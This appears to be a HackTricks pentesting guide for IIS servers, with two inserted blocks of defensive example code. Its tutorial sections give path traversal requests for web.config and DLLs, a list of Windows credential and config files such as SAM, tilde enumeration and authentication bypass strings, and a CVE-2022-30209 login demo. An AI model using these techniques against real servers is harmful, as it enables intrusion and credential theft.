hacktricks/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md

# IIS - Internet Information Services
{{#include ../../banners/hacktricks-training.md}}
Test executable file extensions:
- asp
- aspx
- config
- php
## Internal IP Address Disclosure
On any IIS server where you get a 302 you can try removing the Host header and using HTTP/1.0; the Location header in the response may then point you to the internal IP address:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
Responses disclosing the internal IP:
```
GET / HTTP/1.0
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Execute .config files
You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## IIS Discovery Bruteforce
Download the list that I created:
{{#file}}
iisfinal.txt
{{#endfile}}
It was created by merging the contents of the following lists:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
Use it without adding any extension; the files that need one already have it.
## Path Traversal
### Leaking source code
Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
> [!NOTE]
> In summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where the executables are located** and download them.\
> From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
> Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.
In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags.
### **Exploring Binary Files**
An example of accessing the **web.config** file is shown below:
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
This request reveals various settings and dependencies, such as:
- **EntityFramework** version
- **AppSettings** for webpages, client validation, and JavaScript
- **System.web** configuration for authentication and runtime
- **System.webServer** module settings
- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc**
These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder.
### **Root Directory Files**
Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation.
### **Namespaces and Web.Config**
MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **Downloading DLLs**
The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download **WebApplication1.dll** is shown:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory.
In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For instance, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**.
### Common files
From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
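As an added example, not code from the page or from the application it describes, this is the server-side check that would reject the requests above: the id is decoded once, normalized, confined to an assumed download root (`/srv/app/downloads`) and refused for configuration files and assemblies. The function name `resolve_download` and the sample ids are constructed for the example.

```python
# Added example (not from the page): a download-handler path check that
# stops "..%2f..%2fweb.config"-style ids. Root and ids are constructed.
import posixpath
from urllib.parse import unquote

# Extensions that must never be served even from inside the download root
# (web.config, connectionstrings.config, global.asax, /bin assemblies).
DENIED_SUFFIXES = (".config", ".asax", ".dll")


def resolve_download(root: str, requested_id: str):
    """Map a user-supplied id to a path under root, or None if rejected.

    Rejected: encoded traversal (..%2f), backslash traversal, absolute
    paths, double encoding (a '%' left after one decode), denied suffixes.
    """
    decoded = unquote(requested_id)
    if "%" in decoded:  # a second encoding layer: refuse, never decode twice
        return None
    decoded = decoded.replace("\\", "/")  # IIS treats both as separators
    if decoded.startswith("/") or ".." in decoded.split("/"):
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if not candidate.startswith(root + "/"):  # must stay strictly inside root
        return None
    if candidate.lower().endswith(DENIED_SUFFIXES):  # IIS is case-insensitive
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_download("/srv/app/downloads", "..%2f..%2fweb.config"))  # None
```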
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404 Error
If you see an error like the following:
![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look at the served **SSL Certificate**; maybe you can find the domain/subdomain name there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
## Old IIS vulnerabilities worth looking for
### Microsoft IIS tilde character "~" Vulnerability/Feature Short File/Folder Name Disclosure
You can try to **enumerate folders and files** inside every discovered folder (even if it requires Basic Authentication) using this **technique**.\
The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../images/image (844).png>)
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
A good idea to **find the final name** of the discovered files is to **ask LLMs** for options, as is done in the script [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py)
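Added example, not from the original page or from the scanner: a simplified model of how NTFS builds the 8.3 short name that the tilde technique reveals, so the 6-character/3-character limit above can be seen on real file names. The function names are the example's own, and the model ignores NTFS collision hashing beyond the `~N` ordinal.

```python
# Added example (not from the page): simplified NTFS 8.3 short-name model.
# It shows why a tilde scan sees "WEB~1.CON" for web.config and nothing at
# all for names that already fit 8.3 (e.g. admin.php). Names are constructed.
import re

# Characters that are NOT allowed in an 8.3 name and get dropped.
_STRIP = re.compile(r"[^A-Z0-9$%'\-_@~`!(){}^#&]")


def _split(name: str):
    base, dot, ext = name.rpartition(".")
    return (name, "") if not dot else (base, ext)


def needs_short_name(name: str) -> bool:
    """True if the long name is not already a valid 8.3 name (case ignored)."""
    base, ext = _split(name)
    if not base or "." in base or len(base) > 8 or len(ext) > 3:
        return True
    return bool(_STRIP.search(base.upper()) or _STRIP.search(ext.upper()))


def short_name(name: str, ordinal: int = 1):
    """Return the 8.3 short name (e.g. WEB~1.CON) or None if none is created.

    ordinal is the ~N counter NTFS bumps when the 6-char prefix collides.
    """
    if not needs_short_name(name):
        return None
    base, ext = _split(name)
    base = _STRIP.sub("", base.upper().replace(".", ""))
    ext = _STRIP.sub("", ext.upper())[:3]      # only 3 extension chars survive
    tail = f"~{ordinal}"
    short = base[: 8 - len(tail)] + tail        # 6 chars of the name + ~N
    return f"{short}.{ext}" if ext else short


def tilde_visible_prefix(name: str):
    """What a short-name scan can learn: (name prefix, ext prefix) or None."""
    sn = short_name(name)
    if sn is None:
        return None
    base, _, ext = sn.partition(".")
    return base.split("~")[0], ext
```

Whether a volume still generates these names can be checked with `fsutil 8dot3name query C:`; disabling generation and stripping the existing short names removes what this technique enumerates.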
### Basic Authentication bypass
**Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
You can try to **mix** this vulnerability and the previous one to find new **folders** and **bypass** the authentication.
## ASP.NET Trace.AXD enabled debugging
ASP.NET includes a tracing mode and its file is called `trace.axd`.
It keeps a very detailed log of all requests made to an application over a period of time.
This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
## ASPXAUTH Cookie
ASPXAUTH uses the following info:
- **`validationKey`** (string): hex-encoded key to use for signature validation.
- **`decryptionMethod`** (string): (default "AES").
- **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
- **`decryptionKey`** (string): hex-encoded key to use for decryption.
However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the attacked server, you may be able to **use the cookie from the second server in the first one** and impersonate the user.\
This attack worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **did not properly check the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user.
```python
# script for sanity check (test.py)
def HashString(password):
    # 32-bit rolling hash: j = c + 101*j (mod 2^32), one step per character
    j = 0
    for c in map(ord, password):
        j = c + (101*j) & 0xffffffff
    return j

# two different passwords, same 32-bit hash
assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
```
```
# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized
# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
{{#include ../../banners/hacktricks-training.md}}